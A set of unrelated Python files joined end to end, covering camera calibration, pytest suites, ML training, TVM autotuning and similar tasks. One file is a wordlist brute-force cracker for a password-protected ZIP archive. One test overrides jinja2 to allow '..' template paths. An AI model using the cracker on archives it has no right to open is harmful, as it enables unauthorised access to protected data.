scaled_abs_sobelxy = np.uint8(255 * abs_sobelxy / np.max(abs_sobelxy))
# 5) Create a binary mask where mag thresholds are met
binary_output = np.zeros_like(scaled_abs_sobelxy)
binary_output[(scaled_abs_sobelxy >= mag_sobelxy_thresh[0]) & (scaled_abs_sobelxy <= mag_sobelxy_thresh[1])] = 1
# 6) Return this mask as your binary_output image
return binary_output
def calibrateCamera(calDir):
'''
function to calibrate camera with several images of a chessboard 9x6, taken with that camera
calDir: directory with camera calibration images
return[0] ret: True if calibration was successful
return[1] mtx: calibration matrix
return[2] dist: distortion coefficients
return[3] rvecs: rotation vectors for camera position in the world
return[4] tvecs: translation vectors for camera position in the world
'''
# calibration save file
calibrationPkl = calDir + '/.calibration.pkl'
# if one exists, then the calibration can be loaded from there instead of new calculation
if os.path.isfile(calibrationPkl):
log('info', 'precalculated calibration file found - loading that: '+calibrationPkl)
[ret, mtx, dist, rvecs, tvecs] = pickle.load(open(calibrationPkl, "rb"))
return ret, mtx, dist, rvecs, tvecs
# Arrays to store object points and image points from all the images.
objpoints = [] # 3d point in real world space
imgpoints = [] # 2d points in image plane.
# prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)
# for 9 * 6 corner points
objp = np.zeros((6*9,3), np.float32)
objp[:,:2] = np.mgrid[0:9,0:6].T.reshape(-1,2)
fnameImages = glob.glob(calDir + '/*')
# for every image
# collect the image points and the object points (these are the same for every image)
for fname in fnameImages:
# read image
img = cv2.imread(fname)
# convert to grayscale
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# find the chess board corners
ret, corners = cv2.findChessboardCorners(gray, (9, 6), None)
# If found, add object points, image points (after refining them)
if ret == True:
log('info', 'chess board corners found in image '+fname.split('/')[-1])
# draw the found corners and display them
#img = cv2.drawChessboardCorners(img, (9, 6), corners, ret)
# show to check
#plt.imshow(img)
#plt.show()
#sys.exit(0)
objpoints.append(objp)
imgpoints.append(corners)
else:
log('warn', 'skipping - chess board corners NOT found in image '+fname.split('/')[-1])
# calibrate camera
ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1], None, None)
# write calibration as file pkl to avoid next time calculation
log('info', "writing camera calibration to pickle " + calibrationPkl)
pickle.dump( [ret, mtx, dist, rvecs, tvecs], open(calibrationPkl, "wb") )
# return
return ret, mtx, dist, rvecs, tvecs |
import os
import string
import numpy as np
import pytest
from experiment import Experiment, Parameter
from .util import get_output_dir
# Get name of output directory, and create it if it doesn't exist
output_dir = get_output_dir("Experiment")
@pytest.mark.parametrize(
"seed, plot",
[(491, True), (6940, False), (2903, False)]
)
def test_find_best_parameters(seed, plot):
""" Test that the Experiment.find_best_parameters method does indeed find
the best parameters. As an objective function we use the norm of the inputs,
for which the best parameters are the ones which have the lowest absolute
value, and check that the best values are found. Also test plotting the best
parameters """
# Set the random seed
np.random.seed(seed)
# Set the number of parameters
if plot:
# If plotting, only use a small number of parameters to save time
num_params = 3
else:
# Otherwise use a larger random number of parameters
num_params = np.random.randint(5, 10)
# Define the function that will be called by the Experiment object
def run_experiment(**kwargs):
""" Function that will be called by the Experiment object """
# Check that we have the right number of inputs
assert len(kwargs) == num_params
# Return the norm of the input values
return np.linalg.norm(list(kwargs.values()))
# Get the output directory name, and create it if it doesn't exist already
test_output_dir = os.path.join(
output_dir,
"test_find_best_parameters",
"seed = %i" % seed
)
if not os.path.isdir(test_output_dir):
os.makedirs(test_output_dir)
# Get the output filename and open it
output_filename = os.path.join(test_output_dir, "output.txt")
with open(output_filename, "w") as f:
# Initialise the experiment object
experiment = Experiment(run_experiment, test_output_dir, output_file=f)
# Define shortcut expression for adding parameters
addp = lambda *args: experiment.add_parameter(Parameter(*args))
# Iterate through each parameter
for i in range(num_params):
# Choose a unique and valid parameter name
name = string.ascii_letters[i]
# Choose a random number of values, range of values, and default
num_values = np.random.randint(5, 10)
val_range = np.random.normal(size=num_values)
default = np.random.choice(val_range)
# Add the parameter to the Experiment object
addp(name, default, val_range)
# Call the method to find the best parameter values
experiment.find_best_parameters(plot)
# Iterate through each parameter in the Experiment object
for param in experiment._param_list:
# Find the minimum absolute parameter value
min_abs_val = min(abs(x) for x in param.val_range)
# Check that the default parameter value is the best one
assert abs(param.default) == min_abs_val
@pytest.mark.parametrize("seed", [4061, 44, 8589])
def test_sweep_all_parameters(seed):
""" Test calling the Experiment.sweep_all_parameters method, including that
the parameters are not updated unless specified """
# Set the random seed
np.random.seed(seed)
# Set the number of parameters
num_params = np.random.randint(5, 10)
# Define the function that will be called by the Experiment object
def run_experiment(**kwargs):
""" Function that will be called by the Experiment object """
# Check that we have the right number of inputs
assert len(kwargs) == num_params
# Return the norm of the input values
return np.linalg.norm(list(kwargs.values()))
# Get the output directory name, and create it if it doesn't exist already
test_output_dir = os.path.join(
output_dir,
"test_sweep_all_parameters",
"seed = %i" % seed
)
if not os.path.isdir(test_output_dir):
os.makedirs(test_output_dir)
# Get the output filename and open it
output_filename = os.path.join(test_output_dir, "output.txt")
with open(output_filename, "w") as f:
# Initialise the experiment object
experiment = Experiment(run_experiment, test_output_dir, output_file=f)
# Define shortcut expression for adding parameters
addp = lambda *args: experiment.add_parameter(Parameter(*args))
# Iterate through each parameter
for i in range(num_params):
# Choose a unique and valid parameter name
name = string.ascii_letters[i]
# Choose a random number of values and range of values
num_values = np.random.randint(5, 10)
val_range = np.random.normal(size=num_values)
# Set the default value to the worst possible value
max_abs_val = max(abs(x) for x in val_range)
default = [val for val in val_range if abs(val) == max_abs_val][0]
# Add the parameter to the Experiment object
addp(name, default, val_range)
# Get dictionary of original parameter names and defaults
param_defaults_original = experiment.get_default_param_dictionary()
# Call the method to sweep over all the parameter values
f.write("Calling sweep_all_parameters with update_parameters=False\n")
experiment.sweep_all_parameters(plot=False, update_parameters=False)
# Get dictionary of updated parameter names and defaults
param_defaults_new = experiment.get_default_param_dictionary()
# Assert that the parameter defaults haven't changed
assert param_defaults_new == param_defaults_original
# Call the same method, but this time also update the parameters
f.write("Calling sweep_all_parameters with update_parameters=True\n")
experiment.sweep_all_parameters(plot=False, update_parameters=True)
# Get dictionary of updated parameter names and defaults
param_defaults_new = experiment.get_default_param_dictionary()
# Assert that this time the parameter defaults HAVE changed
assert param_defaults_new != param_defaults_original
@pytest.mark.parametrize("seed", [4176, 1959, 2518])
def test_save_results_as_text(seed):
""" Test calling the Experiment.save_results_as_text method """
# Set the random seed
np.random.seed(seed)
# Set the number of parameters
num_params = np.random.randint(5, 10)
# Define the function that will be called by the Experiment object
def run_experiment(**kwargs):
""" Function that will be called by the Experiment object """
# Check that we have the right number of inputs
assert len(kwargs) == num_params
# Return the norm of the input values
return np.linalg.norm(list(kwargs.values()))
# Get the output directory name, and create it if it doesn't exist already
test_output_dir = os.path.join(
output_dir,
"test_save_results_as_text",
"seed = %i" % seed
)
if not os.path.isdir(test_output_dir):
os.makedirs(test_output_dir)
# Get the output filename and open it
output_filename = os.path.join(test_output_dir, "output.txt")
with open(output_filename, "w") as f:
# Initialise the experiment object
experiment = Experiment(run_experiment, test_output_dir, output_file=f)
# Define shortcut expression for adding parameters
addp = lambda *args: experiment.add_parameter(Parameter(*args))
# Iterate through each parameter
for i in range(num_params):
# Choose a unique and valid parameter name
name = string.ascii_letters[i]
# Choose a random number of values, range of values, and default
num_values = np.random.randint(5, 10)
val_range = np.random.normal(size=num_values)
default = np.random.choice(val_range)
# Add the parameter to the Experiment object
addp(name, default, val_range)
# Find the best parameter values
experiment.find_best_parameters(plot=False)
# Write the results of all experiments to a text file
experiment.save_results_as_text()
|
# -*- coding: utf-8 -*-
from config import db
class OrderAidanceCheck(db.Model):
__tablename__ = "boss_order_aidance_check"
id = db.Column(db.Integer, primary_key=True, nullable=False)
aidance_id = db.Column(db.Integer)
submit_time = db.Column(db.DateTime)
submit_person = db.Column(db.String(20))
check_status = db.Column(db.SmallInteger)
check_time = db.Column(db.DateTime)
check_person = db.Column(db.String(20))
check_remark = db.Column(db.String(200))
sort = db.Column(db.SmallInteger)
def __init__(self, aidance_id, submit_time, submit_person, check_status, check_time, check_person, check_remark,
sort):
'''Constructor'''
self.aidance_id = aidance_id
self.submit_time = submit_time
self.submit_person = submit_person
self.check_status = check_status
self.check_time = check_time
self.check_person = check_person
self.check_remark = check_remark
self.sort = sort
def __repr__(self):
return 'id : %s' % self.id
# Client and database attributes dictionary
clinetHead = ['id', 'aidanceId', 'submitTime', 'submitPerson', 'checkStatus', 'checkTime', 'checkPerson', 'checkRemark',
'sort']
OrderAidanceCheckChangeDic = {
"id": "id",
"aidanceId": "aidance_id",
"submitTime": "submit_time",
"submitPerson": "submit_person",
"checkStatus": "check_status",
"checkTime": "check_time",
"checkPerson": "check_person",
"checkRemark": "check_remark",
"sort": "sort"
}
intList = ['id', 'aidanceId', 'checkStatus', 'sort']
# db.create_all()
|
from sympy import *
from saveAndLoadEquation import *
def main():
x, y, z, t = symbols("x y z t")
h = Function("h")(x, z, t)
hbar = Function("hbar")(z)
hhat = Function("hhat")(z)
htilde = Function("htilde")(x, z)
F1 = Function("F1")(x, z, t)
F2 = Function("F2")(x, z, t)
P = Function("P")(x, z, t)
theta, Re, C = symbols("theta Re C")
epsilon = symbols("epsilon")
delta = symbols("delta")
alpha, beta, omega = symbols("alpha beta omega")
strings = loadStrings("benney.txt")
ht = list(map(parse_expr, strings))
ht = series(ht[0].subs(h, hbar + delta*htilde).doit(), delta, 0)
httilde = ht.coeff(delta, 1)
f = open('linearised-rivulet-benney-latex.tex', 'w')
f.write(latex(httilde))
f.close
hthat = powsimp((httilde.subs(htilde, hhat * exp(I * alpha * x + I * beta * z))
/ exp(I * alpha * x + I * beta * z)).doit().expand()).expand()
f = open('linearised-rivulet-benney-exp-latex.tex', 'w')
f.write(latex(hthat))
f.close
f = open('linearised-rivulet-benney.txt', 'w')
f.write(str(hthat))
f.close
pprint(hthat)
print()
if __name__=="__main__":
main()
|
import unittest
import jinja2
from woeman.fs import MockFilesystem, normalize_symlinks, unsafe_jinja_split_template_path
from woeman import brick, Input, Output
class FilesystemTests(unittest.TestCase):
def testBrickBasePath(self):
"""Test the mapping of Brick parts to filesystem paths."""
@brick
class Part:
def __init__(self):
self.p_ran = True
def output(self, result):
pass
@brick
class Experiment:
def __init__(self):
self.e_ran = True
self.part = Part()
self.parts = [Part()]
self.mapped = {'zero': Part()}
def output(self, result):
result.bind(self.part.result)
e = Experiment()
e.setBasePath('/e')
self.assertEqual(e._brick_path, '/e/Experiment')
self.assertEqual(e.part._brick_path, '/e/Experiment/part')
self.assertEqual(e.parts[0]._brick_path, '/e/Experiment/parts_0')
self.assertEqual(e.mapped['zero']._brick_path, '/e/Experiment/mapped_zero')
def testCreateInOuts(self):
"""Test creation of input/output directory structures and symlinks for Bricks and their parts."""
unitTest = self
@brick
class Part:
def __init__(self, partInput):
unitTest.assertTrue(isinstance(partInput, Input))
def output(self, partResult):
unitTest.assertTrue(isinstance(partResult, Output))
@brick
class Experiment:
def __init__(self, experimentInput):
"""
Bricks idiomatically pass only their filesystem inputs as __init__() arguments.
The actual value of 'experimentInput' received in here is wrapped by the woeman.Input() class
"""
unitTest.assertTrue(isinstance(experimentInput, Input))
unitTest.assertEquals(experimentInput.ref, '/data/input')
self.part = Part(experimentInput)
def output(self, experimentResult):
experimentResult.bind(self.part.partResult)
fs = MockFilesystem()
e = Experiment('/data/input')
e.setBasePath('/e')
e.createInOuts(fs)
dirs = {
'/e/Experiment/part/input',
'/e/Experiment/input',
'/e/Experiment/part/output',
'/e/Experiment/output'
}
self.assertEqual(fs.dirs, dirs)
symlinks = {
'/e/Experiment/input/experimentInput': '/data/input',
'/e/Experiment/part/input/partInput': '../../input/experimentInput',
'/e/Experiment/output/experimentResult': '../part/output/partResult'
}
print(fs.symlinks)
self.assertEqual(fs.symlinks, normalize_symlinks(symlinks))
# test dependencies
self.assertEqual(e.dependencyFiles('output'), ['part/brick'])
def testAbsoluteInOutNames(self):
"""Test absolute path generation of Inputs and Outputs in Jinja templates."""
# allows '..' in the template path, contrary to jinja2 default implementation
jinja2.loaders.split_template_path = unsafe_jinja_split_template_path
@brick
class AbsPaths:
def __init__(self, input):
pass
def output(self, result):
pass
fs = MockFilesystem()
p = AbsPaths('/data/input')
p.setBasePath('/e')
p.write(fs)
# original template: "cat {{ input }} > {{ result }}"
files = {'/e/AbsPaths/brick.do': 'cat /e/AbsPaths/input/input > /e/AbsPaths/output/result'}
self.assertEqual(fs.files, files)
|
import tvm
import logging
from tvm import autotvm
import numpy as np
import sys
function = None
global_s = None
global_bufs = None
@autotvm.template
def GEMMAutoTVM(*args):
global function
def getSplit(maxNum):
splitList = []
splitList.append(1)
para = 2
while (True):
if para <= maxNum / 2 and para <= 32:
splitList.append(para)
para *= 2
else:
break
if 16 in splitList:
splitList.remove(16)
return splitList
ops, bufs = function(*args)
s = tvm.create_schedule(ops)
gemm_tensor = bufs[len(bufs) - 1]
gemm_op = s[gemm_tensor]
x = gemm_op.op.axis[1]
y = gemm_op.op.axis[2]
k = gemm_op.op.reduce_axis[0]
cfg = autotvm.get_config()
cfg.define_knob("split_x", getSplit(int(y.dom.extent)))
cfg.define_knob("split_k", getSplit(int(k.dom.extent)))
cfg.define_knob("split_y", getSplit(int(x.dom.extent)))
xo, xi = gemm_op.split(x, cfg["split_x"].val)
yo, yi = gemm_op.split(y, cfg["split_y"].val)
ko, ki = gemm_op.split(k, cfg["split_k"].val)
gemm_op.reorder(xo, ko, yo, xi, ki, yi)
# cfg.define_annotate("yi_unroll", [yi], policy='try_unroll')
# yio, yii = gemm_op.split(yi, factor=4)
# gemm_op.unroll(yi)
return s, bufs
@autotvm.template
def CONVAutoTVM(*args):
global function
def getSplit(maxNum):
splitList = []
splitList.append(1)
para = 2
while (True):
if para <= maxNum / 2 and para <= 32:
splitList.append(para)
para *= 2
else:
break
if 16 in splitList:
splitList.remove(16)
return splitList
ops, bufs = function(*args)
s = tvm.create_schedule(ops)
# get bias_tensor, conv_tensor, pad_tensor and their ops relatively
bias_tensor = None
conv_tensor = None
pad_tensor = None
conv_tensor = bufs[len(bufs) - 1]
in_tensor2 = conv_tensor.op.input_tensors[1]
in_tensor1 = conv_tensor.op.input_tensors[0]
if in_tensor2.op.name == "bias":
bias_tensor = conv_tensor
conv_tensor = in_tensor1
in_tensor1 = conv_tensor.op.input_tensors[0]
pad_tensor = in_tensor1
if bias_tensor != None:
bias_op = s[bias_tensor]
conv_op = s[conv_tensor]
pad_op = s[pad_tensor]
# get axis
# conv!
oc = conv_op.op.axis[1]
x = conv_op.op.axis[2]
y = conv_op.op.axis[3]
ic = conv_op.op.reduce_axis[0]
kh = conv_op.op.reduce_axis[1]
kw = conv_op.op.reduce_axis[2]
# pad!
pad_x = pad_op.op.axis[2]
pad_y = pad_op.op.axis[3]
pad_c = pad_op.op.axis[1]
# bias
if bias_tensor != None:
bias_x = bias_op.op.axis[2]
bias_y = bias_op.op.axis[3]
bias_c = bias_op.op.axis[1]
# define search space!
cfg = autotvm.get_config()
cfg.define_knob("split_oc", getSplit(int(oc.dom.extent)))
if bias_tensor != None:
cfg.define_knob("split_bias_c", getSplit(int(bias_c.dom.extent)))
cfg.define_knob("split_pad_c", getSplit(int(pad_c.dom.extent)))
cfg.define_knob("split_ic", getSplit(int(ic.dom.extent)))
if bias_tensor != None:
cfg.define_knob("split_bias_x", getSplit(int(bias_x.dom.extent)))
cfg.define_knob("split_pad_x", getSplit(int(pad_x.dom.extent)))
cfg.define_knob("split_x", getSplit(int(x.dom.extent)))
if bias_tensor != None:
cfg.define_knob("split_bias_y", getSplit(int(bias_y.dom.extent)))
cfg.define_knob("split_pad_y", getSplit(int(pad_y.dom.extent)))
cfg.define_knob("split_y", getSplit(int(y.dom.extent)))
# optimize
# conv
oco, oci = conv_op.split(oc, cfg["split_oc"].val)
ico, ici = conv_op.split(ic, cfg["split_ic"].val)
xo, xi = conv_op.split(x, cfg["split_x"].val)
yo, yi = conv_op.split(y, cfg["split_y"].val)
conv_op.reorder(oco, ico, xo, yo, oci, ici, xi, yi)
# pad
pad_co, pad_ci = pad_op.split(pad_c, cfg["split_pad_c"].val)
pad_yo, pad_yi = pad_op.split(pad_y, cfg["split_pad_y"].val)
pad_xo, pad_xi = pad_op.split(pad_x, cfg["split_pad_x"].val)
pad_op.reorder(pad_co, pad_xo, pad_yo, pad_ci, pad_xi, pad_yi)
# bias
if bias_tensor != None:
bias_co, bias_ci = bias_op.split(bias_c, cfg["split_bias_c"].val)
bias_xo, bias_xi = bias_op.split(bias_x, cfg["split_bias_x"].val)
bias_yo, bias_yi = bias_op.split(bias_y, cfg["split_bias_y"].val)
bias_op.reorder(bias_co, bias_xo, bias_yo, bias_ci, bias_xi, bias_yi)
# cfg.define_annotate("yi_unroll", [yi], policy='try_unroll')
# pad_op.compute_inline() # too bad!
return s, bufs
def auto_schedule(func, args):
global function
function = func
logFile = open("matmul.log", 'w', encoding="utf-8")
logFile.truncate()
logFile.close()
# return s, bnfs
autotvmFunc = None
config_sp_size = 0
if len(args) == 4:
config_sp_size = 100
autotvmFunc = GEMMAutoTVM
else:
config_sp_size = 200
autotvmFunc = CONVAutoTVM
task = autotvm.task.create(autotvmFunc, args=(args), target='llvm')
print(task.config_space)
measure_option = autotvm.measure_option(
builder='local',
runner=autotvm.LocalRunner(number=3))
# begin tuning, log records to file `matmul.log`
tuner = autotvm.tuner.GATuner(task)
tuner.tune(n_trial=config_sp_size,
measure_option=measure_option,
callbacks=[autotvm.callback.log_to_file('matmul.log')])
with autotvm.apply_history_best('matmul.log'):
with tvm.target.create("llvm"):
s, arg_bufs = autotvmFunc(*args)
print(tvm.lower(s, arg_bufs, simple_mode=True))
return s, arg_bufs
|
import numpy as np
import random
from monitor import monitor
'''
AdaGrad's intuition explaining
https://www.youtube.com/watch?v=0qUAb94CpOw
'''
def update_mini_batch(
network, mini_batch, eta, lmbda, n,
epsilon, AdaGrad_b, AdaGrad_w):
grad_b = [np.zeros(b.shape) for b in network.biases]
grad_w = [np.zeros(w.shape) for w in network.weights]
for x, y in mini_batch:
delta_grad_b, delta_grad_w = network.backprop(x, y)
grad_b = [gb + dgb for gb, dgb in zip(grad_b, delta_grad_b)]
grad_w = [gw + dgw for gw, dgw in zip(grad_w, delta_grad_w)]
AdaGrad_b = [past + (gb/len(mini_batch)) ** 2
for past, gb in zip(AdaGrad_b, grad_b)]
AdaGrad_w = [past + (gw/len(mini_batch) + (lmbda/n)*w) ** 2
for past, gw, w in zip(AdaGrad_w, grad_w,network.weights)]
network.weights = [w - (eta/np.sqrt(ada_w + epsilon))*(gw/len(mini_batch) + (lmbda/n)*w)
for w, gw, ada_w in zip(network.weights, grad_w, AdaGrad_w)]
network.biases = [b - (eta/np.sqrt(ada_b + epsilon))*(gb/len(mini_batch))
for b, gb, ada_b in zip(network.biases, grad_b, AdaGrad_b)]
return AdaGrad_b, AdaGrad_w
def AdaGrad(
network, training_data, epochs, mini_batch_size, eta,
epsilon=0.00000001, lmbda = 0.0,
evaluation_data=None,
monitor_evaluation_cost=False,
monitor_evaluation_accuracy=False,
monitor_training_cost=False,
monitor_training_accuracy=False):
n = len(training_data)
AdaGrad_b = [np.zeros(b.shape) for b in network.biases]
AdaGrad_w = [np.zeros(w.shape) for w in network.weights]
evaluation_cost, evaluation_accuracy = [], []
training_cost, training_accuracy = [], []
for j in xrange(epochs):
random.shuffle(training_data)
mini_batches = [
training_data[k:k+mini_batch_size]
for k in xrange(0, n, mini_batch_size)
]
print "epochs[%d]" % j
for mini_batch in mini_batches:
AdaGrad_b, AdaGrad_w = update_mini_batch(
network, mini_batch, eta, lmbda, n,
epsilon, AdaGrad_b, AdaGrad_w
)
monitor(network, training_data, evaluation_data,
training_cost,training_accuracy,evaluation_cost,evaluation_accuracy,
lmbda,
monitor_evaluation_cost, monitor_evaluation_accuracy,
monitor_training_cost, monitor_training_accuracy)
return training_cost, training_accuracy, evaluation_cost, evaluation_accuracy
|
def verifica_intervalo(N):
dentro = 0
fora = 0
for i in range(N):
X = int(input())
if (X >= 10 and X <= 20):
dentro += 1
else:
fora += 1
print(f'{dentro} in\n{fora} out')
def main():
N = int(input())
verifica_intervalo(N)
main() |
from PIL import Image
import matplotlib.pyplot as plt
import tensorflow as tf
import numpy as np
import sys,os
from net3 import model
import cPickle as pickle
def get_testdata(img):
img = np.array(img) < 150
a = np.zeros([img.shape[0]+2, img.shape[1]+2], dtype='float32')
a[1:-1, 1:-1] = img
img=a
plt.imshow(img)
plt.show()
h,w = img.shape
for x in range(1,h-1):
for y in range(1,w-1):
surround_4 = img[x,y+1] + img[x-1, y] + img[x+1, y] + img[x,y-1]
surround_4_x = img[x-1,y+1] + img[x+1,y+1] + img[x-1,y-1] + img[x+1,y-1]
surround_8 = surround_4 + surround_4_x
if img[x,y] and (surround_4 <= 1 or surround_8 <= 2):
img[x,y] = 0
px=img.sum(0)
i = 1
j = px.shape[0] - 1
while(i < j and px[i] <= 1): i+=1
while(i < j and px[j] <= 1): j-=1
img = img[:,i:j+1]
px = img.sum(0)
d = img.shape[1] / 4
p1, p2, p3 = int(d), int(d * 2), int(d * 3)
def fine_tune(start):
for i in range(3):
new_start = px[start-5:start+5].argmin() + start-5
if start == new_start:
end = start
while(end < w and px[start] == px[end]): end += 1
return (start + end) >> 1
start = new_start
return start
p1, p2, p3 = fine_tune(p1), fine_tune(p2), fine_tune(p3)
child_img_list = []
def crop(start, end):
a = np.zeros([25, 25])
length = end - start
edge = (25 - length) >> 1
a[:,edge:edge+length] = img[1:-1, start:start+length]
return a
child_img=crop(0,p1)
child_img_list.append(child_img)
child_img=crop(p1,p2)
child_img_list.append(child_img)
child_img=crop(p2,p3)
child_img_list.append(child_img)
child_img=crop(p3,img.shape[1])
child_img_list.append(child_img)
img=child_img_list
img=np.array(img)
ss=0
for i in range(4):
test_dataset=np.array(img[i],dtype='float32').reshape(-1,25,25,1)
with open('/home/ouyangruo/Documents/BiShe/Model_one/args.pickle','rb') as f:
args=pickle.loads(f.read())
session = tf.InteractiveSession()
test_prediction = model(test_dataset, args, False)
result=np.argmax(test_prediction.eval(),1)
# plt.title(result)
# plt.imshow(img[i])
# plt.show()
if(i==0):
ss=result*1000
elif (i==1):
ss=ss+result*100
elif (i==2):
ss=ss+result*10
elif (i==3):
ss=ss+result
f.close()
return ss |
import sys
sys.stdin = open('minseok_assignment.txt','r')
T = int(input())
for time in range(T):
N,K = map(int,input().split())
finish = list(map(str,input().split()))
all_class = [str(i) for i in range(1,N+1)]
ans=[]
for student in all_class:
if student not in finish:
ans.append(student)
ans = ' '.join(ans)
print('#{0} {1}'.format(time+1,ans)) |
import numpy as np
import tensorflow as tf
print(tf.__version__)
# tf.logging.set_verbosity(tf.logging.INFO)
# This implementation is loosly based on the implementation of huib. Offcourse everything is understood and adaptions have been made to make it a normal NN.
def cnn_model_fn(features, labels, mode):
"""Model function for CNN."""
# Input layer
image1 = tf.cast(features["x"], tf.float32)
input_layer = tf.reshape(image1, [-1,784]) # We have to reshape because the image is normaly formatted in 28x28.
dense = tf.compat.v1.layers.dense(# We hope to find parts of the digit here.
inputs=input_layer, # 784 input neurons go in here.
units=300,
activation=tf.nn.sigmoid
)
dense1 = tf.compat.v1.layers.dense( # We hope to find combination of above parts here.
inputs=dense,
units=300,
activation=tf.nn.sigmoid
)
# Logits layer
logits = tf.compat.v1.layers.dense(inputs=dense1, units=10) # 10 output nodes for 0-10 digits.
predictions = {
# Generate predictions (for PREDICT and EVAL mode)
"classes": tf.argmax(input=logits, axis=1),
# Add 'softmax_tensor' to the graph. It is used for PREDICT and by the 'logging_hook'
"probabilities": tf.nn.softmax(logits, name="softmax_tensor")
}
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions)
# Calculate loss (for both TRAIN and EVAL modes)
onehot_labels = tf.one_hot(indices=tf.cast(labels, tf.int32), depth=10)
loss = tf.compat.v1.losses.softmax_cross_entropy(onehot_labels=onehot_labels, logits=logits)
# Configure the Training Op (for TRAIN)
if mode == tf.estimator.ModeKeys.TRAIN:
optimizer = tf.compat.v1.train.GradientDescentOptimizer(learning_rate=0.001)
train_op = optimizer.minimize(
loss=loss,
global_step=tf.compat.v1.train.get_global_step()
)
return tf.estimator.EstimatorSpec(mode=mode, loss=loss, train_op=train_op)
# Add evaluation metrics (for EVAL mode)
eval_metric_ops = {
"accuracy": tf.compat.v1.metrics.accuracy(
labels=labels, predictions=predictions["classes"]
)
}
return tf.estimator.EstimatorSpec(
mode=mode, loss=loss, eval_metric_ops=eval_metric_ops
)
def main(unused_argv):
# Load training and eval data
mnist = tf.keras.datasets.mnist.load_data()
train_data = mnist[0][0]
train_labels = mnist[0][1]
eval_data = mnist[1][0]
eval_labels = mnist[1][1]
# Create the Estimator
mnist_classifier = tf.estimator.Estimator(
model_fn=cnn_model_fn,
model_dir="/tmp/mnist_convnet_model"
)
# Set up logging for predictions
tensors_to_log = {"probabilities": "softmax_tensor"}
logging_hook = tf.estimator.LoggingTensorHook(
tensors=tensors_to_log, every_n_iter=50
)
# Train the model
train_input_fn = tf.compat.v1.estimator.inputs.numpy_input_fn(
x={"x": train_data},
y=train_labels,
batch_size=100, # We pass 100 images per weight update to tensorflow
num_epochs=None,
shuffle=True
)
mnist_classifier.train(
input_fn=train_input_fn,
steps=10000,
# hooks=[logging_hook]
)
# Evaluate the model and print results
eval_input_fn = tf.compat.v1.estimator.inputs.numpy_input_fn(
x={"x": eval_data},
y=eval_labels,
num_epochs=1,
shuffle=False
)
eval_results = mnist_classifier.evaluate(input_fn=eval_input_fn)
print(eval_results)
if __name__ == "__main__":
tf.compat.v1.app.run()
|
from zipfile import ZipFile
zf = ZipFile("~/test3/aaa.zip")
pass_file = open("~/test3/dictionary.txt")
for line in pass_file.readlines():
password = line.strip("\n")
try:
zf.extractall(path="~/test3/", pwd=password.encode("cp850", "replace"))
print("\nPassword Found: {}\n".format(password))
exit(0)
except Exception as e:
print("Searching... Bad password: {}".format(password))
continue
|
import random
class Solution:
def find_second_largest(self, nums):
max_1, max_2 = 0, 0
for num in nums:
if num > max_1:
max_2 = max_1
max_1 = num
elif num > max_2 and num != max_1:
max_2 = num
return max_2
def find_kth_largest_element_2(self, nums, k):
nums = sorted(nums, reverse=True)
return nums[k - 1]
def find_kth_largest_element(self, nums, k):
if not nums:
return
p = random.choice(nums)
l, m, r = [x for x in nums if x > p], [x for x in nums if x == p], [x for x in nums if x < p]
nums, i, j = l + m + r, len(l), len(l) + len(m)
if k <= i:
return self.find_kth_largest_element(nums[:i], k)
elif k > j:
return self.find_kth_largest_element(nums[j:], k - j)
else:
return nums[i]
s = Solution()
print(s.find_second_largest([1, 3, 2, 16, 3, 7, 9]))
|
#encoding='utf-8'
try:
import os,sys,pytest,allure,time,re,time
except Exception as err:
print('导入CPython内置函数库失败!错误信息如下:')
print(err)
sys.exit(0)#避免程序继续运行造成的异常崩溃,友好退出程序
base_path=os.path.dirname(os.path.abspath(__file__))#获取当前项目文件夹
base_path=base_path.replace('\\','/')
sys.path.insert(0,base_path)#将当前目录添加到系统环境变量,方便下面导入版本配置等文件
print(base_path)
try:
from iso_http_basic import index
from iso_http_basic import message
from common import fun
import common.ssh as c_ssh
except Exception as err:
print(
'导入基础函数库失败!请检查相关文件是否存在.\n文件位于: ' + str(base_path) + '/common/ 目录下.\n分别为:pcap.py rabbitmq.py ssh.py\n错误信息如下:')
print(err)
sys.exit(0) # 避免程序继续运行造成的异常崩溃,友好退出程序
else:
del sys.path[0] # 及时删除导入的环境变量,避免重复导入造成的异常错误
# import index
# del sys.path[0]
#dir_dir_path=os.path.abspath(os.path.join(os.getcwd()))
#sys.path.append(os.getcwd())
from common import clr_env
from common import baseinfo
from common.rabbitmq import *
from data_check import http_check
datatime = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))
FrontDomain = baseinfo.BG8010FrontDomain
BackDomain = baseinfo.BG8010BackDomain
proxy_ip = baseinfo.BG8010FrontOpeIp
rbmExc = baseinfo.rbmExc
http_url = index.http_url
http_content = baseinfo.http_content
class Test_iso_http_basic():
def setup_method(self):
clr_env.data_check_setup_met(dut='FrontDut')
clr_env.data_check_setup_met(dut='BackDut')
def teardown_method(self):
clr_env.iso_setup_class(dut='FrontDut')
clr_env.iso_setup_class(dut='BackDut')
def setup_class(self):
# 获取参数
fun.ssh_FrontDut.connect()
fun.ssh_BackDut.connect()
fun.ssh_BG8010Server.connect()
fun.ssh_BG8010Client.connect()
fun.ssh_httpServer.connect()
self.case1_step1 = index.case1_step1
self.case1_step11 = index.case1_step11
self.case2_step1 = index.case2_step1
self.case2_step11 = index.case2_step11
self.case3_step1 = index.case3_step1
self.case3_step11 = index.case3_step11
self.http_url = index.http_url
self.downfile_url = index.downfile_url
self.downlocalPath = index.downlocalPath
self.upfile_url = index.upfile_url
self.upfilename = index.upfilename
self.uplocalPath = index.uplocalPath
self.upMIME_type = index.upMIME_type
self.up_url = index.up_url
clr_env.iso_setup_class(dut='FrontDut')
clr_env.iso_setup_class(dut='BackDut')
# @pytest.mark.skip(reseason="skip")
@allure.feature('验证隔离下的http代理策略')
def test_iso_http_basic_a1(self):
# 下发配置
fun.send(rbmExc, message.addhttp_front['AddCustomAppPolicy'], FrontDomain, base_path)
fun.send(rbmExc, message.addhttp_back['AddCustomAppPolicy'], BackDomain, base_path)
fun.wait_data('ps -ef |grep nginx', 'FrontDut', 'nginx: worker process')
front_res = fun.nginx_worker('ps -ef |grep nginx', 'FrontDut', 'nginx: worker process',name='前置机nginx进程')
assert front_res == 1
fun.wait_data('ps -ef |grep nginx', 'BackDut', 'nginx: worker process')
